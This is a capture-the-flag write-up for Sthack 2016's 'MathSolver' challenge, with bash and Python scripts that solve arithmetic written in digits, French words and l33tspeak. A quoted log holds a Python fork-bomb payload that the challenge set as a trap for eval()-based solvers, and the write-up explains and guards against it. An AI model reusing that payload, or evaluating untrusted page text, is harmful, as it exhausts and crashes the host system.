MathSolver - Writeup by Pibou & Kordump

Challenge

http://mathsolver.sthack.fr/
Résolvez les 30 niveaux en moins de 10 secondes pour obtenir le flag de validation!
Solve the 30 levels in less than 10 seconds to get the flag!

Bash Solution (Kordump)

I have to solve 30 levels of common calculations issued by an HTML page. Let's do this.

The following command solves the first level, using bc (« basic calculator »):

math.sh
curl -c cookie_jar -b cookie_jar -d "res=$(curl -c cookie_jar -b cookie_jar http://mathsolver.sthack.fr/|grep calc|tee -a /tmp/log|sed "s/^.*calc'>\([^<]*\)<.*$/\1/g"|bc)" http://mathsolver.sthack.fr/play.php|tee next_level|grep "level .."

Here is a sample of /tmp/log for the first 12 levels:

/tmp/log
Can you solve the level 1?<br/><h3><div id='calc'>0 * 7</div></h3><br/>
Can you solve the level 2?<br/><h3><div id='calc'>8 + 7</div></h3><br/>                
Can you solve the level 3?<br/><h3><div id='calc'>7 - 3</div></h3><br/>                
<!-- ... -->
Can you solve the level 11?<br/><h3><div id='calc'>5907 - 6002</div></h3><br/>                
Can you solve the level 12?<br/><h3><div id='calc'>[__import__('os').fork() for x in range (0,100000) ]</div><div id='sry'>4698 * 7940</div></h3><br/>
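
The `calc` block of level 12 carries a Python payload rather than an expression, presumably aimed at solvers that feed the page content to `eval()`. A minimal sketch of a safer evaluation, assuming expressions always have the form `<int> <op> <int>` as in the log above; `safe_eval` is a hypothetical name and not part of either solution:

```python
import operator
import re

# Operators used by the challenge according to the writeup: +, -, * and %.
OPS = {'+': operator.add, '-': operator.sub, '*': operator.mul, '%': operator.mod}

# Assumed shape: two non-negative integers around a single operator.
EXPR = re.compile(r'\s*(\d+)\s*([-+*%])\s*(\d+)\s*')

def safe_eval(expr):
    """Evaluate '<int> <op> <int>' without eval(); raise ValueError otherwise."""
    m = EXPR.fullmatch(expr)
    if m is None:
        raise ValueError('not a plain arithmetic expression: %r' % expr)
    left, op, right = m.groups()
    return OPS[op](int(left), int(right))

print(safe_eval('5907 - 6002'))  # -95
```

Anything that is not plain arithmetic, such as the level 12 payload, is rejected instead of being executed.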

The following levels are a bit harder, as the numbers are written out in French words:

/tmp/log
Can you solve the level 13?<br/><h3><div id='calc'>soixante quatorze + seize</div></h3><br/>

French numbers are a bit complex, so let's build ourselves a dictionary:

dictionnary.sh
for i in $(seq 1 10000)
do echo $(curl http://chiffre-en-lettre.fr/ecrire-nombre-$i|grep -A 1 "1990 :</i><br>"|grep "h6"|sed "s:.*bsp;\([^;]\+[^<]\+\)</h6.*:\1:") $i >> dico
done
# A few cosmetic changes were applied to the raw dictionary to fit the challenge.
# The final, refined dictionary is in « dico_final ».

A couple of functions later, we can parse the remaining 18 levels, including the l33tsp34k ones:

math.sh
function conv_plaintext_to_number
{
    echo "$1" >> /tmp/conv_log
    cat dico_final|awk '$1=$1'|grep "$1"|head -n 1|rev|cut -d " " -f 1|rev
}
 
function normalize_level
{
    cat "$1" | grep calc | sed "s/^.*calc'>\([^<]*\)<.*$/\1/g"\
    | sed "s/1/i/g;s/3/e/g;s/4/a/g;s/0/o/g;s/5/s/g;s/  / /g" > current_level
 
    echo -n "$(conv_plaintext_to_number "$(cat current_level | sed "s/^\(.\+\) [^a-z] .*/\1/g")")"
    echo -n "$(cat current_level | sed "s/^.\+ \([^a-z]\) .*/  \1  /g")"
    echo "$(conv_plaintext_to_number "$(cat current_level | sed "s/^.\+ [^a-z] \(.*\)/\1/g")")"
}
 
# Solve the 13th and 14th levels
curl -c cookie_jar -b cookie_jar -d "res=$(normalize_level next_level_B|tee -a /tmp/bc_log|bc)" http://mathsolver.sthack.fr/play.php|tee next_level_A|tee -a output_final|grep 'level ...'
curl -c cookie_jar -b cookie_jar -d "res=$(normalize_level next_level_A|tee -a /tmp/bc_log|bc)" http://mathsolver.sthack.fr/play.php|tee next_level_B|tee -a output_final|grep 'level ...'
 
# ...

Below is a proper solution in Python. ;)

Python Solution (Pibou)

English


The challenge consists of an HTML page which contains a calculation. The goal is to solve the 30 levels by sending the result to the form.

I used a Session object from requests to keep the session open across requests.

The difficulty increases with the level: the first calculations are written in digits, then in French words, and finally in l33t5p34k. The possible operations are +, -, * and %.
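
The l33t5p34k levels only need a character substitution before the words can be looked up. A minimal sketch using `str.translate`, assuming the same five substitutions as solver.py (0 to o, 1 to i, 3 to e, 4 to a, 5 to s) and that a token counts as l33t only when it mixes letters and digits; `unleet` is a hypothetical helper name:

```python
# Digit-to-letter table, mirroring the replacements used in solver.py.
LEET = str.maketrans('01345', 'oieas')

def unleet(token):
    """Decode a l33t token; leave pure numbers and pure words untouched."""
    has_letter = any(c.isalpha() for c in token)
    has_digit = any(c.isdigit() for c in token)
    if has_letter and has_digit:
        return token.translate(LEET)
    return token

words = 'd3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3'.split(' ')
print(' '.join(unleet(w) for w in words))
# deux mille huit cent un * quatre mille neuf cent douze
```

Checking for a mix of letters and digits keeps plain numeric operands from the early levels intact.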

To solve this challenge, I wrote a script mostly based on regular expressions.

There are several special cases to cover, especially numbers such as 80 (quatre-vingt) and 90 (quatre-vingt-dix): in written French they are the only single-word numbers built on a multiplication (4 × 20) rather than an addition (as in dix-huit, 10 + 8).
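
To illustrate the special case: a hyphenated token is normally the sum of its parts, except when it starts with quatre-vingt. The sketch below assumes hyphenated tokens like those handled in solver.py; `hyphenated_value` and the reduced `UNITS` table are hypothetical and cover only this example. It also accepts longer forms such as quatre-vingt-dix-sept, which is an assumption about how the challenge might spell them, and it ignores the plural quatre-vingts.

```python
# Reduced word table for the example (the full one is in solver.py).
UNITS = {'quatre': 4, 'sept': 7, 'huit': 8, 'dix': 10, 'vingt': 20, 'soixante': 60}

def hyphenated_value(token):
    """Value of a hyphenated French number word, e.g. 'dix-huit' -> 18."""
    prefix = 'quatre-vingt'
    if token.startswith(prefix):
        # 'quatre-vingt' is 4 * 20; whatever follows is added on top.
        rest = token[len(prefix):].strip('-')
        extra = sum(UNITS[w] for w in rest.split('-')) if rest else 0
        return 80 + extra
    # Every other compound is a plain sum of its parts.
    return sum(UNITS[w] for w in token.split('-'))

for t in ('dix-huit', 'soixante-dix', 'quatre-vingt', 'quatre-vingt-dix'):
    print(t, hyphenated_value(t))
```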

Another difficulty was introduced: at level 12, the HTML page has a different structure. The calculation is in a <div id='sry'> block, while the regular <div id='calc'> block holds a decoy instead. This detail must be taken into account when writing the script.
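
One way to handle both layouts, sketched with the standard `re` module and the level 12 markup from /tmp/log. `extract_expression` is a hypothetical name, and the pattern assumes the expression sits on a single line and contains no `</div>`:

```python
import re

def extract_expression(html):
    """Return the text of <div id='sry'> if present, else of <div id='calc'>."""
    for div_id in ('sry', 'calc'):
        m = re.search(r"<div id='%s'>(.*?)</div>" % div_id, html)
        if m:
            return m.group(1).strip()
    return None  # neither block was found

level_12 = ("<h3><div id='calc'>[__import__('os').fork() for x in range (0,100000) ]</div>"
            "<div id='sry'>4698 * 7940</div></h3>")
print(extract_expression(level_12))  # 4698 * 7940
```

Trying `sry` first means the decoy in `calc` is never read when both blocks are present.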

With a dictionary that maps each elementary number word (one that is not a composition of others) to its value, we can parse the expression and rebuild each number. By grouping the parts of an operand in one list, we can simply call sum on that list to get the operand, then perform the calculation.
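
As a worked example of that last step, here is a minimal sketch that turns already decoded words into a number. It is not the code from solver.py: `words_to_number` is a hypothetical helper that multiplies the pending value by cent or mille and then sums the groups, and its reduced word table covers only the level 30 expression.

```python
WORDS = {'un': 1, 'deux': 2, 'quatre': 4, 'huit': 8, 'neuf': 9,
         'douze': 12, 'cent': 100, 'cents': 100, 'mille': 1000}

def words_to_number(words):
    """Convert space-separated French number words to an int (below one million)."""
    total = 0   # completed thousands
    group = 0   # value accumulated since the last 'mille'
    for w in words.split():
        v = WORDS[w]
        if v == 100:
            group = max(group, 1) * 100    # 'huit cent' -> 800, bare 'cent' -> 100
        elif v == 1000:
            total += max(group, 1) * 1000  # 'deux mille' -> 2000, bare 'mille' -> 1000
            group = 0
        else:
            group += v
    return total + group

a = words_to_number('deux mille huit cent un')
b = words_to_number('quatre mille neuf cent douze')
print(a, b, a * b)  # 2801 4912 13758512
```

The printed values match the execution trace of level 30 shown after the script.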

solver.py
#!/usr/bin/python
 
import re
import requests
 
nombres = {
        "zero": 0,
        "un": 1,
        "deux": 2,
        "trois": 3,
        "quatre": 4,
        "cinq": 5,
        "six": 6,
        "sept": 7,
        "huit": 8,
        "neuf": 9,
        "dix": 10,
        "onze": 11,
        "douze": 12,
        "treize": 13,
        "quatorze": 14,
        "quinze": 15,
        "seize": 16,
        "vingt": 20,
        "trente": 30,
        "quarante": 40,
        "cinquante": 50,
        "soixante": 60,
        "cent": 100,
        "cents": 100,
        "mille": 1000,
}
 
def open_session():
    req = requests.Session()
    req.headers.update({'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'})
 
    return req
 
def calcul(req, data):
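    # Level 12 puts the real expression in <div id='sry'>; prefer it when present.
    # Raw strings avoid the invalid '\/' escape, and '.*?' stops at the first </div>.
    if "<div id='sry'>" in data.text:
        regex = re.search(r"<div id='sry'>(?P<calcul>.*?)</div>", data.text)
    else:
        regex = re.search(r"<div id='calc'>(?P<calcul>.*?)</div>", data.text)
    print(regex.group('calcul'))
    calcul = regex.group('calcul').rstrip()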
 
    parties = calcul.split(' ')
    print(parties)
 
    mots_op1 = []
    mots_op2 = []
    est_op1 = True
    i = 0
    for p in parties:
        # l33t5p34k
        if bool(re.search('[a-z]', p, re.IGNORECASE)) and bool(re.search('[0-9]', p)) and len(p) > 1:
            p = p.replace('0', 'o')
            p = p.replace('5', 's')
            p = p.replace('3', 'e')
            p = p.replace('1', 'i')
            p = p.replace('4', 'a')
 
        # Nombre en toutes lettres
        if bool(re.search('[a-z-]', p, re.IGNORECASE)) and len(p) > 1:
            if '-' in p:
                if p == 'quatre-vingt':
                    if est_op1:
                        mots_op1.append(80)
                    else:
                        mots_op2.append(80)
                elif p == 'quatre-vingt-dix':
                    if est_op1:
                        mots_op1.append(90)
                    else:
                        mots_op2.append(90)
                else:
                    decoupe = p.split('-')
                    nb = 0
                    for e in decoupe:
                        nb = nb + nombres[e]
                        print(nombres[e])
                    if est_op1:
                        mots_op1.append(nb)
                    else:
                        mots_op2.append(nb)
            else:
                if est_op1:
                    mots_op1.append(nombres[p])
                else:
                    mots_op2.append(nombres[p])
        # Chiffre
        elif bool(re.search('[0-9]', p)):
            if est_op1:
                mots_op1.append(int(p))
            else:
                mots_op2.append(int(p))
        # Opération
        else:
            operation = p
            est_op1 = False
        i = i + 1
 
    # Grands nombres (>= 100)
    i = 0
    for m1 in mots_op1:
        if (i + 1) < len(mots_op1):
            if m1 < mots_op1[i + 1] and (i + 1) < len(mots_op1) and mots_op1[i + 1] >= 100:
                mots_op1[i] = m1 * mots_op1[i + 1]
                del(mots_op1[i + 1])
            i = i + 1
 
    i = 0
    for m2 in mots_op2:
        if (i + 1) < len(mots_op2):
            if m2 < mots_op2[i + 1] and (i + 1) < len(mots_op2) and mots_op2[i + 1] >= 100:
                mots_op2[i] = m2 * mots_op2[i + 1]
                del(mots_op2[i + 1])
            i = i + 1
 
 
    print(mots_op1)
    print(mots_op2)
 
    # Each list now holds the additive parts of one operand, already as ints.
    op1 = sum(mots_op1)
    op2 = sum(mots_op2)
 
    print(op1)
    print(op2)
 
    if operation == '+':
        return op1 + op2
    elif operation == '-':
        return op1 - op2
    elif operation == '*':
        return op1 * op2
    elif operation == '%':
        return op1 % op2
 
if __name__=='__main__':
    r = open_session()
    res_data = r.get('http://mathsolver.sthack.fr/play.php')
    # The challenge has 30 levels; the response to the last answer is printed too.
    for _ in range(30):
        res = calcul(r, res_data)
        print(res)
        res_data = r.post(url="http://mathsolver.sthack.fr/play.php", data={'res': res})
        print(res_data.text)

Here is the execution trace for the last level:

<html>

<head>

        <meta charset="utf-8">
        <title>MathSolver</title>

</head>
<body>

        <div id="content" style="text-align: center;">
                Can you solve the level 30?<br/><h3><div id='calc'>d3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3</div></h3><br/>                <form action="#" method="post">
                        <input type="text" name="res" /></p>
                        <p><input type="submit" value="OK"></p>
                </form>
        </div>
</body>

d3ux m1ll3 hu1t c3nt un * qu4tr3 m1ll3 n3uf c3nt d0uz3
['d3ux', 'm1ll3', 'hu1t', 'c3nt', 'un', '*', 'qu4tr3', 'm1ll3', 'n3uf', 'c3nt', 'd0uz3']
[2000, 800, 1]
[4000, 900, 12]
2801
4912
13758512

French


The challenge consists of an HTML page containing a calculation and a form. Each calculation must be solved and its result sent to the form, for all 30 levels.

I used a Session object from requests to keep the session.

The difficulty of the levels increases: the first calculations are written in digits, then in words, and finally in l33t5p34k. The possible operations are +, -, * and %.

To solve this challenge, I relied mainly on regular expressions.

Several special cases have to be handled, notably numbers such as quatre-vingt and quatre-vingt-dix, the only two single-word numbers that are a product rather than a sum (unlike dix-huit, for example).

An extra difficulty was added: at level 12, the returned HTML page has a different structure, with the calculation in a <div id='sry'> block rather than in the usual <div id='calc'>. The script has to take this into account.

Starting from a dictionary with the numbers written in words as keys and their values as values, the expression can be parsed and the corresponding number rebuilt. By grouping the units in a list, calling sum on that list gives the number, and the calculation can then be carried out.

ctf/public/sthack2016/mathsolver.txt · Last modified: 2016/10/06 07:12 by arthaum